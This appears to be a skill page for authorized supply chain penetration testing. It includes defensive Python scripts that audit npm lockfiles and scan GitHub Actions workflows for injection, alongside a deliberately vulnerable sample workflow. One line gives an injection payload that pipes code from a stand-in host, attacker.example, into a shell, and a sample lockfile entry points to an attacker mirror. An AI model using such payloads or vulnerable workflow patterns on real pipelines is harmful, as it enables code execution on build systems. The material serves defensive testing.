pentest-supply-chain
This skill guides penetration testing of software supply chain vulnerabilities including dependency confusion attacks, CI/CD pipeline injection, lockfile manipulation, and build artifact verification. Use it when authorized to assess an organization's exposure to supply chain threats like those exploited in SolarWinds and Log4Shell incidents, particularly when evaluating dependency security, package registry risks, container integrity, and software bill of materials accuracy across development pipelines.
```bash
git clone --depth 1 https://github.com/jd-opensource/JoySafeter /tmp/pentest-supply-chain && cp -r /tmp/pentest-supply-chain/skills/pentest-supply-chain ~/.claude/skills/pentest-supply-chain
```

SKILL.md
# Pentest Supply Chain

## Purpose

Supply chain attacks (SolarWinds, Log4Shell, xz-utils) are the fastest-growing threat category. Shannon explicitly excludes "vulnerable third-party libraries." MITRE ATT&CK T1195 (Supply Chain Compromise) has zero coverage in any existing skill.

## Prerequisites

### Authorization Requirements

- **Written authorization** with supply chain testing scope
- **Repository access** for dependency and CI/CD analysis
- **Registry awareness** — confirm which private registries are in use
- **Build system access** for pipeline review (if white-box)

### Environment Setup

- Snyk CLI for dependency vulnerability scanning
- npm audit / pip-audit for ecosystem-specific checks
- Trivy for container and filesystem scanning
- socket.dev for dependency risk analysis

## Core Workflow

1. **Dependency Audit**: Analyze package.json/requirements.txt/go.mod for known vulnerable versions, unmaintained packages, and suspicious dependencies.
2. **Dependency Confusion**: Check whether internal package names can be claimed on public registries (npm, PyPI). Test namespace squatting.
3. **CI/CD Pipeline Security**: Review GitHub Actions/GitLab CI for injection via PR titles/branch names, secrets in logs, unpinned action versions, and runner escape.
4. **Build Artifact Integrity**: Verify signatures on containers/packages, check for unsigned artifacts, and test image tag mutability.
5. **Lockfile Integrity**: Detect lockfile injection (manipulated `resolved` URLs) and verify lockfile-to-manifest consistency.
6. **Install Script Abuse**: Identify packages with install hooks that execute arbitrary code, and test typosquatting candidates.
7. **SBOM Generation**: Generate a Software Bill of Materials and map transitive dependency risk with CVE correlation.
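Steps 2, 5 and 6 of the workflow can be checked mechanically against an npm `package-lock.json`. The script below is an added example written for this page, not code from the JoySafeter skill; the registry hosts (`registry.npmjs.org`, `npm.internal.example.com`), the internal scope `@acme`, the internal package name `acme-telemetry`, and the lockfile and manifest contents are constructed assumptions. It relies on the `resolved`, `integrity` and `hasInstallScript` fields that npm 7+ writes into lockfileVersion 2/3 files, and reports a rewritten or unhashed `resolved` URL, manifest/lockfile drift, an internally named package served by the public registry, and packages that declare install hooks.

```python
"""Audit an npm package-lock.json (lockfileVersion 2/3) for supply chain signals.

Added example for this page, not code from the JoySafeter skill.  Registry hosts,
internal scope/package names and the sample lockfile/manifest are constructed.
Relies on the `resolved`, `integrity` and `hasInstallScript` fields that npm 7+
writes for every installed package.
"""
from typing import Iterable, List, NamedTuple, Optional
from urllib.parse import urlparse


class Finding(NamedTuple):
    kind: str      # lockfile-injection | manifest-drift | dependency-confusion | install-script
    package: str
    detail: str


def audit_lockfile(lockfile: dict, manifest: dict, allowed_hosts: Iterable[str],
                   internal_names: Iterable[str], internal_scopes: Iterable[str],
                   public_host: str = "registry.npmjs.org") -> List[Finding]:
    allowed_hosts, internal_names, internal_scopes = set(allowed_hosts), set(internal_names), set(internal_scopes)
    findings: List[Finding] = []
    packages = lockfile.get("packages", {})
    root_deps = packages.get("", {}).get("dependencies", {})
    manifest_deps = {**manifest.get("dependencies", {}), **manifest.get("devDependencies", {})}

    # Step 5: lockfile-to-manifest consistency, checked in both directions.
    for name in sorted(set(manifest_deps) - set(root_deps)):
        findings.append(Finding("manifest-drift", name, "declared in package.json but not pinned by the lockfile"))
    for name in sorted(set(root_deps) - set(manifest_deps)):
        findings.append(Finding("manifest-drift", name, "pinned by the lockfile but absent from package.json"))

    for path, entry in packages.items():
        if not path.startswith("node_modules/"):
            continue
        name = path.rsplit("node_modules/", 1)[1]   # handles nested node_modules/a/node_modules/b
        scope: Optional[str] = name.split("/", 1)[0] if name.startswith("@") else None
        resolved = entry.get("resolved", "")
        url = urlparse(resolved) if resolved else None

        # Step 5: lockfile injection through a rewritten `resolved` URL.
        if url is not None:
            if url.scheme != "https":
                findings.append(Finding("lockfile-injection", name, f"non-HTTPS resolved URL {resolved}"))
            if url.hostname not in allowed_hosts:
                findings.append(Finding("lockfile-injection", name, f"resolved from unlisted host {url.hostname}"))
            if not entry.get("integrity"):
                findings.append(Finding("lockfile-injection", name, "resolved tarball carries no integrity hash"))

        # Step 2: an internally named package that the public registry is serving.
        if (name in internal_names or scope in internal_scopes) and url is not None and url.hostname == public_host:
            findings.append(Finding("dependency-confusion", name, f"internal name resolved from {public_host}"))

        # Step 6: install hooks run arbitrary code at `npm install` time.
        if entry.get("hasInstallScript"):
            findings.append(Finding("install-script", name, f"version {entry.get('version')} declares install scripts"))
    return findings


# Constructed sample data; the integrity values are placeholders, not real hashes.
SAMPLE_MANIFEST = {
    "name": "acme-app",
    "dependencies": {"left-pad": "^1.3.0", "@acme/auth-lib": "^2.1.0",
                     "acme-telemetry": "^1.0.0", "colors-util": "^1.0.0", "express": "^4.18.0"},
}
SAMPLE_LOCKFILE = {
    "name": "acme-app", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"left-pad": "^1.3.0", "@acme/auth-lib": "^2.1.0",
                              "acme-telemetry": "^1.0.0", "colors-util": "^1.0.0"}},
        "node_modules/left-pad": {
            "version": "1.3.0", "integrity": "sha512-PLACEHOLDER",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz"},
        "node_modules/@acme/auth-lib": {
            "version": "2.1.0", "integrity": "sha512-PLACEHOLDER",
            "resolved": "https://npm.internal.example.com/@acme/auth-lib/-/auth-lib-2.1.0.tgz"},
        "node_modules/acme-telemetry": {    # internal name now served by the public registry
            "version": "1.0.0", "integrity": "sha512-PLACEHOLDER", "hasInstallScript": True,
            "resolved": "https://registry.npmjs.org/acme-telemetry/-/acme-telemetry-1.0.0.tgz"},
        "node_modules/colors-util": {       # resolved URL rewritten to an attacker-controlled mirror
            "version": "1.0.0",
            "resolved": "http://cdn.evil-mirror.example/colors-util-1.0.0.tgz"},
    },
}


def run_sample() -> List[Finding]:
    return audit_lockfile(SAMPLE_LOCKFILE, SAMPLE_MANIFEST,
                          allowed_hosts={"registry.npmjs.org", "npm.internal.example.com"},
                          internal_names={"acme-telemetry"}, internal_scopes={"@acme"})


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.kind}] {f.package}: {f.detail}")
```

On the constructed sample this yields six findings: `express` is declared but not pinned, `acme-telemetry` is both a dependency confusion hit and an install-hook package, and `colors-util` trips all three lockfile-injection checks. Against a real repository, load the two JSON files with `json.load` and derive `internal_names` from the private registry's package list; a name that resolves from `registry.npmjs.org` but is not published there in your own scope is the candidate to test for squatting.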
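For step 3, the detector below is an added example for this page, not part of the JoySafeter skill or of actionlint. It scans GitHub Actions workflow text for three patterns: attacker-controlled event data (PR title, branch name, commit message and similar) expanded with `${{ }}` directly inside a `run:` script, `uses:` references not pinned to a full commit SHA, and a `pull_request_target` workflow that checks out the pull request head. Both workflow files are constructed, the vulnerable one beside its hardened form, and the 40-zero commit SHAs in the hardened version are placeholders rather than real commits. The scanner works on the raw text rather than a YAML parser so it runs with the standard library only.

```python
"""Scan GitHub Actions workflow text for CI/CD injection patterns (step 3).

Added example for this page, not code from the JoySafeter skill or from actionlint.
Works on raw workflow text with the standard library only; the sample workflows are
constructed and the 40-zero commit SHAs are placeholders, not real commits.
"""
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    kind: str   # expression-injection | unpinned-action | pwn-request
    line: int   # 1-based line number in the workflow file
    detail: str


# Event fields an outside contributor controls (GitHub's script-injection guidance lists these).
UNTRUSTED_CONTEXT = re.compile(r"""
    \$\{\{\s*(?:
        github\.event\.(?:issue|pull_request|discussion)\.(?:title|body)
      | github\.event\.(?:comment|review|review_comment)\.body
      | github\.event\.pull_request\.head\.(?:ref|label|repo\.default_branch)
      | github\.event\.(?:head_commit|commits\[\d+\]|workflow_run\.head_commit)\.(?:message|author\.(?:name|email))
      | github\.event\.workflow_run\.head_branch
      | github\.head_ref
    )\s*\}\}
""", re.VERBOSE)
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")
USES_KEY = re.compile(r"^\s*(?:-\s+)?uses:\s*([^\s#]+)")
PR_HEAD_REF = re.compile(r"^\s*ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.")
SHA_PIN = re.compile(r"^[0-9a-f]{40}$")


def _indent(s: str) -> int:
    return len(s) - len(s.lstrip(" "))


def scan_workflow(text: str) -> List[Finding]:
    findings: List[Finding] = []
    lines = text.splitlines()
    privileged = re.search(r"\bpull_request_target\b", text) is not None
    i = 0
    while i < len(lines):
        line = lines[i]
        run = RUN_KEY.match(line)
        if run:
            # Collect the whole script: the `run:` line plus any block-scalar continuation lines.
            key_col = len(run.group(1))
            script = [run.group(2)]
            j = i + 1
            while j < len(lines) and (not lines[j].strip() or _indent(lines[j]) > key_col):
                script.append(lines[j])
                j += 1
            for k, chunk in enumerate(script):
                for hit in UNTRUSTED_CONTEXT.finditer(chunk):
                    findings.append(Finding("expression-injection", i + 1 + k,
                                            f"{hit.group(0)} expanded into a shell script"))
            i = j
            continue
        uses = USES_KEY.match(line)
        if uses:
            ref = uses.group(1)
            version = ref.partition("@")[2]
            if not ref.startswith(("./", "docker://")) and not SHA_PIN.match(version):
                findings.append(Finding("unpinned-action", i + 1, f"{ref} is not pinned to a commit SHA"))
        elif privileged and PR_HEAD_REF.match(line):
            findings.append(Finding("pwn-request", i + 1,
                                    "pull_request_target workflow checks out the PR head"))
        i += 1
    return findings


# Constructed: a workflow carrying all three weaknesses.
VULNERABLE_WORKFLOW = """\
name: ci
on: [pull_request_target]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Greet
        run: |
          echo "PR title: ${{ github.event.pull_request.title }}"
          echo "Branch: ${{ github.head_ref }}"
      - uses: some-org/release-tool@main
"""

# Constructed: the same job hardened.  Event data reaches the shell only through
# environment variables, and actions are pinned to full commit SHAs (placeholders here).
HARDENED_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0000000000000000000000000000000000000000 # v4
      - name: Greet
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
          BRANCH: ${{ github.head_ref }}
        run: |
          echo "PR title: $PR_TITLE"
          echo "Branch: $BRANCH"
      - uses: some-org/release-tool@0000000000000000000000000000000000000000 # v1.2.3
"""


if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(f"== {label}: {len(scan_workflow(text))} finding(s)")
        for f in scan_workflow(text):
            print(f"  line {f.line} [{f.kind}] {f.detail}")
```

The vulnerable file produces five findings (two unpinned actions, the PR-head checkout under `pull_request_target`, and two injectable expressions on the `run:` lines); the hardened file produces none, because `${{ }}` values placed in `env:` arrive in the shell as data rather than being substituted into the script text before it is parsed. A PR title such as `"; curl attacker.example | sh; echo "` exercises the difference. The check is deliberately narrow: it does not follow reusable workflows, composite actions, or expressions reaching the shell through `with:` inputs of third-party actions, which a full review still needs to cover.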
## Tool Categories

| Category | Tools | Purpose |
|----------|-------|---------|
| Dependency Scanning | Snyk, npm audit, pip-audit | Known CVE detection |
| Container Scanning | Trivy, Grype | Image vulnerability analysis |
| Dependency Risk | socket.dev, Semgrep | Behavioral risk analysis |
| CI/CD Review | custom scripts, actionlint | Pipeline security audit |
| SBOM | syft, cyclonedx-cli | Bill of materials generation |

## References

- `references/tools.md` - Tool function signatures and parameters
- `references/workflows.md` - Attack pattern definitions and test vectors